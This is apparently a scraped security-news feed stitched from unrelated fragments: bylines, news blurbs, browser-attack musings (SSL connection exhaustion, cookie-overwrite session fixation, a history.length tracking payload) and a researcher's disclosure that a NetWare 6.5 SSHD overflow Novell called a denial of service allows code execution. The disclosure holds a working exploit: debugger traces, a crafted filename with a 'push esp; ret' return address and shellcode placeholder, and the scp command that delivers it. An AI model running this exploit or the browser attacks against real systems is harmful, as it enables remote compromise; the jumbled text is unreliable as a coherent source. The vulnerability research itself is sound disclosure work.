written by Mcstyle.

written by waleedassar.

Squid car....

A Nigerian advance-fee scammer, Okpako Diamreyan, has been sentenced to 12 years in prison by a federal judge.

17 posts left until the end…

A year or so ago I went to go visit the Intel guys at their internal conference that they throw (similar to Microsoft’s Bluehat). I honestly had no idea what to tell a bunch of hardware guys. What correlation does chip manufacturing really have with browsers or webapps. Well virtualization and malware certainly, but what else? It got me thinking… one of the things they are in direct control over is how fast operating systems (and subsequently browsers) work. I talked it over with id before going out there. Faster is better right?

I’ve got mixed feelings about fast vs slow browsers. When something is slow, you can actually detect that something strange is going on. It’s also easier to stop it from mis-behaving if an attack takes a while. When it’s fast, it’s much harder to notice that your computer had to chug for a while to do something complex and much less likely that a user can intervene. There have been a number of exploits out there that have really been proof of concept only. They’re deemed not practical because they take too long, or hang the browser temporarily while they’re being executed. If the speed barrier is removed, then suddenly those old proof of concepts (think res:// timing attacks and so on) are actually much easier to perform. So while I think innovation and performance improvement is a good thing overall, it does come with some unintended consequences.

Armin Van Buuren is one of the world's most well-known trance music DJs. He also apparently has had his credit card details stolen.

18 posts left…

I got an email last night from someone asking me to do a breakdown of which browser is better, Internet Explorer, Firefox, Opera, Safari and Chrome. First of all, there’s already a pretty good reference that Michal Zalewski put together. Like anything this comprehensive, since it’s not been edited for about half a year it’s already out of date in a few ways, but it’s a great place to get started for those who want to get familiar with the internal differences between various browsers. No need to re-invent the wheel, go read it. Now, that’s the purely technical side, but there is one thing that’s wildly missing from most documents that talk about browser security.

Browser security often turns into a religious war amongst technologists, instead of thinking about it pragmatically. What are the real motives of the companies that are developing the browsers? In most cases they care primarily about market share because market share makes them money (through search engine agreements, and so on). So now you have to think about yourself and your needs. What kind of user are you? I tend to be a very security conscious person, and if you’re reading this you probably are too. I’m willing to severely degrade my usability for an increase in security, whereas most users are not. So the browser I will tend towards is one that offers me the flexibility to make those decisions for myself while still giving me enough usability to be able to do anything I need to do, when I decide to. This is why Firefox has been my personal browser of choice for years - but don’t be confused and think it’s because I think Firefox is more secure out of the box. Firefox has just as many flaws as other browsers, by default.

While security people’s needs are important, if you look at the number of people who are security folks compared to the rest of the world, we are insignificant as a percentage. That means that it is not in the browser company’s interest to focus on appeasing security people. Sure, it’s nice to have a browser that is secure, but that’s not ever going to drive the volume of users necessary to make the real revenue for their organizations - or at least that’s what the market seems to be proving. Plus most of the major browsers above tout themselves as being more secure than their competitors - so normal consumers don’t know who to believe. As such, while I think all the major browsers mentioned above have their pros and cons, none of them are designed with security first. They’re designed for a different set of users in mind (which includes security people, but it also includes our grandmas, and tweens and cousin Cletus), and that puts browser design choices somewhat at odds with security, because what does Cletus care or know about security? So that’s where plugins, addons, sandboxes, VMs, etc… come into play. It’s like wearing a condom around your browser, if you like. It gives us the ability to use the same underlying product while still protecting ourselves as much as possible.

I honestly think most browsers can be made to be very secure, if you’re willing to sacrifice all usability - not completely secure, no doubt, but far more secure than any of the major browsers above ship by default. So, it’s a little hard for me to play favorites. They each have their own security mess to clean up, so currently there is no good solution, and I don’t recommend any browsers to anyone (although you people still on IE6 really should upgrade already). The work involved in really securing your browser simply isn’t worth explaining to most people. In fact, “which browser do you use” is my least favorite question, because it’s not as simple as a single word. Boutique browsers, while interesting, don’t often have the support behind them to make them useful for a lot of the more common applications (lacking vast plugin support, etc…) although of anyone, they actually could align themselves nicely with the needs of security people. So, while I think browser security is often about minutia, we need to fully grasp the market forces at work before getting completely fed up by a constant string of functionality that only makes it less secure, instead of expecting dramatic security improvements. Or we need to pick something more obscure and assume the risks involved with a product that is not tried and true. It’s not an easy problem for us or the browser companies - I don’t envy their situation.

written by waleedassar.

Recently I was asking a colleague how desktop black box web application vulnerability scanners, from a scalability perspective, approach scanning large numbers of websites (i.e. 100 to 500+) simultaneously. I was curious about the way they address the physical infrastructure requirements to support big enterprise deployments as compared to our own. Anyone with experience knows commercial desktop black box scanners can easily eat up several gigs of memory and disk space for even a single website. Nothing high-end workstations can’t handle, but multiplied out it’s an entirely different story. The person had an unexpected answer, “Desktop black box scanners don’t have the use-case you [WhiteHat] do, their technology doesn’t need to scale.” Say Whaaa!?!

Asking for clarification he said consider how black box scanners are normally used in the field. They are “developer” or “pen-test” tools where the use-case is one person, one machine, one website, one configured scan, and then let it run for however many hour or days it takes until completion. Attempting to perform dozens or hundreds of scans at the same time would be exceedingly rare, if ever, so the capability to do so doesn’t need to exist. He said, “Who beside you guys [WhiteHat] needs to scan that many websites at a time?” To which I humbly replied, “the customer.”

As we know new Web attack techniques are being published weekly and Web application code is change is rapidly (Agile). Web applications, even those that are old and unchanged, need to be tested often for these issues. Testing once a year, or even once a month, isn’t enough in an environment like the Web where daily attacks are normal. So if an enterprise has say 10 or more websites, to say nothing of those with hundreds or thousands, mass scanning is essential to get through them regularly. Burdening enterprises by having them wire scan nodes together with command and control systems to achieve scale is patently absurd. That's as an inefficient one-to-one model. 100 simultaneous scans = 100 scan boxes. Of course I’m sure they are happy to sell the hardware.

So yes I was a bit surprised that the desktop scanner guys haven’t seen fit to tackle the technology scaling problem, even though two of them are mega corps. They above all should know that scaling must be addressed if performing routine vulnerability assessments on all the Internet’s most important websites is to become a reality. To be fair, we’ve never pulled back the curtain to show off our own infrastructure. Maybe it’s time we did so because over the years we’ve invested heavily and it’s something we’re particularly proud of. I think others would be interested and impressed as well. The physical requirements for WhiteHat Sentinel, a SaaS-based website vulnerability management platform, are in a word -- massive.

Operationally we’re assessing over 2,000 websites on a fairly routine basis (~weekly). A dedicated IT staff is monitoring the systems for over 300 points of interest (utilization of network, cpu, memory, uptime, latency, etc.) ensuring everything is running smoothly 24x7. Metrics show at any moment 450 scans are running concurrently, generating about 300 million HTTP requests per month, and processing 90,000 potential vulnerabilities per day. We preserve a copy of every request sent and response received for audit, trending, tracking, and reporting purposes. This system itself is being access by over 350 different customers with tens of thousands of individual Sentinel users.

CPU and memory wise our ESX virtualization chassis allow us to control resource allocation and scale fast between multiple scanning instances and load balanced front-end & back-end Web servers. As you can see from the pictures we have some serious storage requirements. Our clustered storage arrays have 250TB ready to go (additional capacity at a moments notice), writing about 500GB to disk per day, and connected by dual 10GB backplane ethernet connections. Sick!

Oh, did I forgot to mention the two 100MB links to the Internet? Also very important is that the infrastructure is fully redundant. Pull any network cable, push any power button, and the system keeps on humming. I left out the pictures of the backside of the cages, which is every bit as cool as the front, but there’s a lot of network cords, firewalls, routers and other stuff we’d prefer to keep to ourselves. :) If someone else claims to have a SaaS scanning platform I’m wondering if it looks anything remotely like ours.

The data center where everything is housed is SAS70 Type II certified and state-of-the-art when it comes to power, fire protection, cabling, construction, cooling, and physical security. Guards are on site 24/7/365, active patrols both inside and outside the facility, with 54 closed circuit video cameras covering the interior and exterior of building. To get access to our area requires an appointment, government issued ID, thumbprint, retina scan and only then do they hand over the key to our private space where only two people at WhiteHat have access. I’m not one of them. :) Compare this to the scanner on laptop sitting somewhere unguarded in the enterprise. Clearly we’re not a desktop scanner behind a curtain like others out there. We’re not playing around. We take this stuff extremely seriously.

Interesting: Who are these certificate authorities? At the beginning of Web history, there were only a handful of companies, like Verisign, Equifax, and Thawte, that made near-monopoly profits from being the only providers trusted by Internet Explorer or Netscape Navigator. But over time, browsers have trusted more and more organizations to verify Web sites. Safari and Firefox now trust more...

written by Mcstyle.

written by restorevm.

It has been discovered that in barnowl, a curses-based instant-messaging client, the return codes of calls to the ZPending and ZReceiveNotice functions in libzephyr were not checked, allowing attackers to cause a denial of service (crash of the application), and possibly execute arbitrary code.

In this guest editorial, security research professional Michal Zalewski argues that the government should stay away from compulsory certification and licensing in the security industry.

Clever: Quantum cryptography is often touted as being perfectly secure. It is based on the principle that you cannot make measurements of a quantum system without disturbing it. So, in theory, it is impossible for an eavesdropper to intercept a quantum encryption key without disrupting it in a noticeable way, triggering alarm bells. Vadim Makarov at the Norwegian University of...

The Google Chrome 6.0, available in stable and beta channels for Windows, Mac, and Linux, patches a total of 15 documented security vunerabilities.

The vulnerabilities expose Windows users to remote code execution attacks via maliciously crafted Web sites.

This is beyond stupid: The Pentagon is contemplating an aggressive approach to defending its computer systems that includes preemptive actions such as knocking out parts of an adversary's computer network overseas—but it is still wrestling with how to pursue the strategy legally. The department is developing a range of weapons capabilities, including tools that would allow "attack and exploitation of...

19 posts left…

So Pyloris doesn’t work particularly well for port exhaustion on the server, but what if we can exhaust the connections on the client to better meter out traffic? That would make it easier for a MITM to see each individual request if it worked. So I started down a rather complicated path of using a mess load of link tags on an HTTP website trying to affect the connections on the HTTPS version of the same domain. No joy. It turns out that the limits placed on one port don’t affect what happens on another (at least in Firefox). So while I can exhaust all the connections to a domain over a single port I can’t do anything using HTTPS - or so it seemed (unless I was willing to muddy the water further by sending a bunch of requests that I knew are a certain size to the HTTPS site - which just seemed more painful than helpful).

Then, based on some earlier research I stormed into id’s office and I started bitching that there was no point in trying to stop port exhaustion if they were going to allow tons of connections, just over multiple sockets anyway. As the words came out of my mouth I realized I had come up with the answer - a ton of webservers. I guessed that there must be some upper bound of outbound connections and it’s probably at or less than 130. You should have seen id’s face as I asked him to set up 130 connections / 6 connections per socket = 22 web-servers for me. Hahah… I thought he’d kill me.

It turns out it’s nowhere near 130 open connections. Firefox sets a rather arbitrary 30 connection limit. So if you can create 5 open web-servers and exhaust 30 connections and only free up one long enough to allow the victim to download one request at a time, I think we’re in business. Makes sense in theory. The problem is that it’s REALLLLY slow. I mean… painful. In my testing it seemed more like the server was broken entirely from the victim’s perspective. But eventually… and in some cases I mean minutes later - it would load. I’m sure that the attack could be optimized to work based on the fact that no more packets are being sent when the image gets downloaded or whatever… which would signal the program to free up a connection. This is opposed to my crapola time based solution combined with chunked encoding to force the connection to stay open without downloading anything that I came up with for testing. So I bet this attack could work if someone put some tender loving care into it, but it was kind of a huge waste of time for me personally - and for poor id.

Incidentally, for those who have never seen or met id, and would like to know a little about the other side of webappsec that I don’t talk about much here (the configuration, operating system and network), you’re chance is nearing. There’s a rumor that he’ll be speaking at Lascon in October. He’ll be talking on how he’s managed to secure ha.ckers.org for all these years despite how much of a target I’ve made it. Should be fun.

20 posts left…

Pyloris is a python version of Slowloris, and since it is written in python it’s SSL version is thread safe. So what better way to lock up an SSL/TLS Apache install (given that Apache still hasn’t fixed their DoS)? Well, one of the big problems attackers have when trying to decipher SSL/TLS traffic is the fact that browsers not only send a lot of request down a single connection but they also connect use a bunch of open connections over separate sockets. What if we could use pyloris to exhaust all but one open socket?

Well it turns out that while this sorta works, there are a lot of issues with the concept. Firstly, it requires Apache. Secondly the server can’t be using a load balancer (assuming the load balancer isn’t using Apache itself). Thirdly it requires that there are no other users on the system or there will be a seriously annoying user experience for the poor victim who can’t reach the site that the man in the middle is trying to decipher traffic from. Alas… So while this didn’t work particularly well in my testing, I’m certain with more thinking someone can figure out a way to do this.

21 posts left…

If you’re familiar with XSHM this is going to look awfully similar (but better). When a script creates a new popup (or tab) it retains control over where to send it at a later date. I talked about this concept before. But let’s see what else can be done. What if the attacker uses the history.length function to calculate how many pages a user has visited after they left the tab for wherever they landed. The attacker could do something like this:

a.location = &aposdata:text/html;utf-8,<script>alert(history.length);history.go(-1);<\/script>&apos;

By setting either a recursive setTimeout or using some manual polling mechanism, the attacker can (in this case) cause a popup which monitors how many pages they’ve gone. Normally it wouldn’t cause a popup, the attacker would redirect to another domain that they had access to which would do the same history.length check. Voila. The user only sees a brief white flash and then the same page they were just on - as if nothing happened. They’d probably just think their browser is messing up again. This could be helpful in a number of esoteric situations where the number of pages visited may change, or you may want to force them through several flows (and back and forth again) all with a single mouse click - giving you authority to popup in the first place. The best part is that this will follow them while they surf for as long as both windows stay open.

22 posts left…

While thinking about the previous issue and listening to Jeremiah’s preso and talking with the guys at Microsoft I got to thinking about cookie clobbering. Let’s say that Microsoft thinks HTTP cookies overwriting secure cookies is a big enough problem to fix. Let’s walk through the use cases. Let’s say there is a separate place for secure cookies that can’t be overwritten by non-secure cookies. Does that mean two cookies are replayed in HTTPS space, or that the HTTPS cookie always wins? Okay… let’s say it wins and the secure flag cookie cookie is the only one sent. Well let’s not forget about Jer’s cookie clobbering script.

When an attacker forces overwriting of the cookie jar, they get the exact same effect. Now the victim has no cookies secure or otherwise if the global cookie jar stays the same size and it remains a LIFO system. So now you’re saying, well the attacker can just use a SSL/TLS enabled cookie clobbering scripts - you’re right! So now there has to be a per-site container… or something - and doesn’t that completely defeat the purpose of the upper limits on cookies anyway? Now DoS conditions become an issue with overwriting the disc with tons of huge cookies, and so on. Anyway… this probably needs a lot more thought, and I’m certainly not advocating “fixing” this, just to end up with a worse situation than we already have. But certainly secure cookies shouldn’t be clobbered by HTTP cookies - in my opinion.

23 posts left…

It’s been known for a long time that HTTP can set cookies that can be read in HTTPS space because cookies don’t follow the same origin policy in the way that JavaScript does. More importantly, HTTP cookies can overwrite HTTPS cookies, even if the cookies are marked as secure. I started thinking of a form of session fixation during our research that uses this to the attacker’s advantage. Let’s assume the attacker wants to get access to a user’s account that’s over SSL/TLS. Now let’s assume the website sets a session cookie prior to authentication and after authentication the site marks the cookie as valid for whatever username/password combo it receives.

First, the attacker goes to the website before the victim gets there so he can get a session cookie. Then, if the victim is still in HTTP for the same domain the attacker can set a cookie that will replay to the HTTPS website. So the attacker sets the same cookie that he just received into the victim’s browser. Once the victim authenticates, the cookie that the attacker gave the victim (and knows) is now valid for the victim’s account. Now if the victim was already authenticated or had already gotten a session token, no big deal. The attacker overwrites the cookie, which at worst logs the user out. Once the victim re-authenticates, voila - session fixation. Now all the attacker has to do is replay the same cookie in his own browser and he’s in the user’s account.

24 posts left…

When I told one of my guys about the double DNS rebinding attack, he said, “Well it’s a good thing I use perspectives.” So that was my clue that I had better get familiar with the plugin if people are seriously relying on it for security. In the process we found a number of potential issues. For those of you who aren’t super clued in about this tool it was originally designed to handle situations where governments are tapping people using things like Packet Forensics where a valid certificate authority is being used to man in the middle someone or a group of individuals.

First of all it’s easy to detect perspectives for a man in the middle. Perspectives sends a lot of HTTP traffic, which the attacker can easily read and figure out is related to perspectives. That may not seem important, because if an attacker knows that a user has it installed what can they really do? We’ll come back to this.

Embedded content is not verified by perspectives, only the parent window. Because most websites (even HTTPS) use third party service providers, caching servers or whatever for static content, the attacker will simply MitM’s the “static” servers serving up CSS, JavaScript or objects that are dynamic content once rendered. By modifying the response and including active content, anything that can be seen by the DOM is still accessible to the man in the middle. Kinda defeats the purpose of perspectives…

Using the fact that an attacker knows that someone is using perspectives (which they can determine by forcing someone through an SSL/TLS link), the attacker can simply MITM only the embedded content. Of course there are changes a user can make to the settings and options to reduce this risk, but like all options, they’re probably not changed often and the defaults really aren’t good.

Lastly, I tried perspectives against the double DNS rebinding issue, and unfortunately instead of the huge pop-down that would actually alert someone to the problem, because the attack uses a valid cert from a nearby sub-domain that perspectives has probably seen before it only gives the small warning that most people probably wouldn’t notice unless they were really paying attention.

25 posts left…

One of the issues Josh and I talked about at Blackhat was how the SSL certificate warning message can be used to gain information about a user’s behavior and how that can be used against the user. Let’s say a man in the middle causes an error via proxying a well-known owner/subsidiary. For example let’s say https://www.youtube.com/ which most technical people know belongs to Google and which, incidentally causes SSL/TLS mismatch errors because it’s mis-configured. Experts who see such an error and investigate will think it’s just a dumb (innocent) error. Non-experts will click through immediately, because they always do when they see such things.

By measuring the wait time the attacker can know which type of user the victim is - a technical one, or a novice. If the user is a novice the attacker knows they don’t have to worry anymore - they can deliver their snake oil cert later if the user goes through it “quickly” because that user’s behavior will most likely stay the same. Of course figuring out the timing might be a bit tricky because really new users will be awfully confused by cert warnings and will seem “slow” I’d bet. Anyway, something to investigate further.

Posted by Zef Cekaj


This is a little information clarifying the exploitability of ZDI-10-169 as discovered by ZDI researcher Francis Provencher. Novell has classified this bug as a Denial of Service and will not be issuing a patch. Novell's official statement is available here.




For the sake of lulz, please narrate this to yourself in the voice of the Old Spice Guy:


Hello World!


Look at Novell's report:

A vulnerability has been identified in NetWare 6.5 SSH which, if exploited

repeated[sic], could be used for a Denial-of-Service Attack. The flaw exists in

SSHD.NLM and one of it's sub-modules, SFTP-SVR.NLM.

Now look back to mine:

The flaw exists within SSHD.NLM. When the application attempts to resolve an 

absolute path on the server, a 512 byte destination buffer is used without

bounds checking. By providing a large enough value, an attacker can cause a

buffer to be overflowed. Successful exploitation results in remote code

execution under the context of the server.

Look at Novell's module:

# .m SSHD.NLM

SSHD.NLM         OpenSSH daemon(NICI) 3.7.1p6 (SP8 build 78)

   Loaded from [SYS:SYSTEM\] on Aug 25, 2010   1:15:12 pm

  [145]  OS address space

  Version 3.71.05   October 21, 2008

  Code Address: 8E187000h  Length: 00078EF5h

  Data Address: 9A0A2000h  Length: 0003416Ah

Now back to mine:

# .m SSHD.NLM

SSHD.NLM         OpenSSH daemon(NICI) 3.7.1p6 (SP8 build 78)

   Loaded from [SYS:SYSTEM\] on Aug 25, 2010   1:15:12 pm

  [145]  OS address space

  Version 3.71.05   October 21, 2008

  Code Address: 8E187000h  Length: 00078EF5h

  Data Address: 9A0A2000h  Length: 0003416Ah

Now look at Novell's code:

.bss:0002DAE1

.bss:0002DAE1     loc_2DAE1:

.bss:0002DAE1 424 mov     ebx, [ebp+var_40C]

.bss:0002DAE7 424 dec     ebx

.bss:0002DAE8 424 mov     eax, [ebp+var_41C]

.bss:0002DAEE 424 mov     eax, [eax+ebx*4]

.bss:0002DAF1 424 push    eax             ; arg

.bss:0002DAF2 428 mov     eax, [ebp+var_414]

.bss:0002DAF8 428 mov     eax, [eax+60h]

.bss:0002DAFB 428 push    eax             ; arg

.bss:0002DAFC 42C push    offset aSS_8    ; fmt ("%s/%s")

.bss:0002DB01 430 lea     eax, [ebp+var_408]

.bss:0002DB07 430 push    eax             ; dst

.bss:0002DB08 434 call    LIBC@sprintf

.bss:0002DB0D 434 add     esp, 10h

And their function return:

# dds ebp-8

Color Code: Code  Data  Allocated  Free  Mapped  Not Mapped

9A452DC8  --8E228240 ?

9A452DCC  --913249A0 ?

9A452DD0  --9A452DE4 ?

9A452DD4  823EBB98 (LIBC.NLM|ThreadStartFunc+D8)

Now supply a sufficiently large path as the source of a secure copy (scp).


Now back to mine:

# dds ebp-8

Color Code: Code  Data  Allocated  Free  Mapped  Not Mapped

9A452DC8  --41414141 ?

9A452DCC  --41414141 ?

9A452DD0  --41414141 ?

9A452DD4  823E0041 (LIBC.NLM|_mf_10to2+B1)

Note that we have overwritten two bytes in the return address (0x41 and the 0x00 aka null terminator) Now lets let the function clean up and return:

.bss:0002DD9A 424 lea     esp, [ebp-8]

.bss:0002DD9D 00C pop     esi

.bss:0002DD9E 008 pop     ebx

.bss:0002DD9F 004 pop     ebp

.bss:0002DDA0 000 retn

Now look at the debugger:

# g

Break at 8E1B4D9A because of break  3 (instruction execute)

Current Focus Processor:  00

EAX = 00000005 EBX = 00000003 ECX = 9A4783A0 EDX = 9A452994

ESI = 9A4529C8 EDI = 94DEB040 EBP = 9A452DD0 ESP = 9A4529B0

EIP = 8E1B4D9A FLAGS = 00000206 (PF IF)

8E1B4D9A?8D65F8         LEA     ESP, [EBP-08]

Display next 3 instructions:

# u eip 3

8E1B4D9D 5E             POP     ESI

8E1B4D9E 5B             POP     EBX

8E1B4D9F 5D             POP     EBP

Display next three addresses on the stack (these correspond to the three pop's shown above)

# dds esp 3

Color Code: Code  Data  Allocated  Free  Mapped  Not Mapped

9A452DC8  --41414141 ?

9A452DCC  --41414141 ?

9A452DD0  --41414141 ?

Execute those instructions:

# p 3

Break at 8E1B4DA0 because of proceed single step

Current Focus Processor:  00

EAX = 00000005 EBX = 41414141 ECX = 9A4783A0 EDX = 9A452994

ESI = 41414141 EDI = 94DEB040 EBP = 41414141 ESP = 9A452DD4

EIP = 8E1B4DA0 FLAGS = 00000206 (PF IF)

8E1B4DA0 C3             RET

Now look at Novell's return address:

# dds esp

Color Code: Code  Data  Allocated  Free  Mapped  Not Mapped

9A452DD4  823EBB98 (LIBC.NLM|ThreadStartFunc+D8)

Now back to mine:

# dds esp

Color Code: Code  Data  Allocated  Free  Mapped  Not Mapped

9A452DD4  823E0041 (LIBC.NLM|_mf_10to2+B1)

Sadly this isn't a Denial of Service.

* Note: I only overwrote 2 bytes of the return address so you can easily see the modification. We can overwrite it in its entirety.


Exploiting this issue:
We partially overwrite the return address above using a single \x41 and the terminating null from sprintf, this isn't very useful. A much better choice would be the address of a:

push esp

ret

The address of this instruction sequence is from multiple versions of LIBC.NLM is available at:

https://www.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/netware/smb/lsass_cifs.rb

SP8 was missing but a quick byte search yielded this address:

[ 'NetWare 6.5 SP8', { 'Ret' => 0x823C870C } ], # push esp - ret (libc.nlm)

So update the buffer (filename) with the address of 'push esp; ret' and tack on some \xcc (int3) so it has something to execute.

$ cat nssh.txt

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBB

BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB

BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB

BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB

BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB

BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB

BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB

BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCC\x0c\x87\x3c\x82

\xcc\xcc\xcc\xcc\xcc\xcc\xcc

$ scp user@172.22.33.11:$(echo -e `cat nssh.txt`) .

Now look at the stack:

# dds

Color Code: Code  Data  Allocated  Free  Mapped  Not Mapped

9BADAE14  823C870C (LIBC.NLM|SetThrType+C)

9BADAE18  --CCCCCCCC (LOADER.NLM|UserAddressSpace+C4CCCCC)

9BADAE1C  --00CCCCCC ?

Now back to the instruction pointer:
Loading address of '\xcc' onto stack.

# r

k at 823C870C because of proceed single step

Current Focus Processor:  00

EAX = 00000005 EBX = 43434342 ECX = 9A1367A0 EDX = 9BADA9D4

ESI = 42424242 EDI = 9B8790E0 EBP = 43434343 ESP = 9BADAE18

EIP = 823C870C FLAGS = 00000206 (PF IF)

823C870C 54             PUSH    ESP

Return (pop this address into eip)

# p

Break at 823C870D because of proceed single step

Current Focus Processor:  00

EAX = 00000005 EBX = 43434342 ECX = 9A1367A0 EDX = 9BADA9D4

ESI = 42424242 EDI = 9B8790E0 EBP = 43434343 ESP = 9BADAE14

EIP = 823C870D FLAGS = 00000206 (PF IF)

823C870D C3             RET

Now back to the stack:

# dds

Color Code: Code  Data  Allocated  Free  Mapped  Not Mapped

9BADAE14  --9BADAE18 ?

9BADAE18  --CCCCCCCC (LOADER.NLM|UserAddressSpace+C4CCCCC)

9BADAE1C  --00CCCCCC ?

Now look at Novell's report:

A vulnerability has been identified in NetWare 6.5 SSH which, if exploited

repeated[sic], could be used for a Denial-of-Service Attack. 

Now look back.
The instructions are now mine, anything is possible when you control EIP.

# p

Break at 9BADAE18 because of proceed single step

Current Focus Processor:  00

EAX = 00000005 EBX = 43434342 ECX = 9A1367A0 EDX = 9BADA9D4

ESI = 42424242 EDI = 9B8790E0 EBP = 43434343 ESP = 9BADAE18

EIP = 9BADAE18 FLAGS = 00000206 (PF IF)

9BADAE18 CC             INT     3

I'm in a debugger:

# b

Active breakpoints.

 0 E X S 8E1B4AE1 SSHD.NLM|SCPSShellThread+321

 1 E X S 8E1B4A6D SSHD.NLM|SCPSShellThread+2AD

 2 E X S 8E1B47C0 SSHD.NLM|SCPSShellThread

 3 E X S 8E1B4D9A SSHD.NLM|SCPSShellThread+5DA

 4 E X S 8E1B4B0D SSHD.NLM|SCPSShellThread+34D

-Zef

Heartland Payment Systems has agreed to pay $5 million to Discover to settle claims arising from the massive data breach disclosed by the payment processor last year.

The Defense Advanced Research Projects Agency (DARPA) has launched an effort aimed at finding and detecting to insider threats on Department of Defense networks.

A Miami man has pleaded guilty to two identity-theft related charges after federal agents found more than 26,000 credit card numbers stored on his computer, the U.S. Department of Justice said.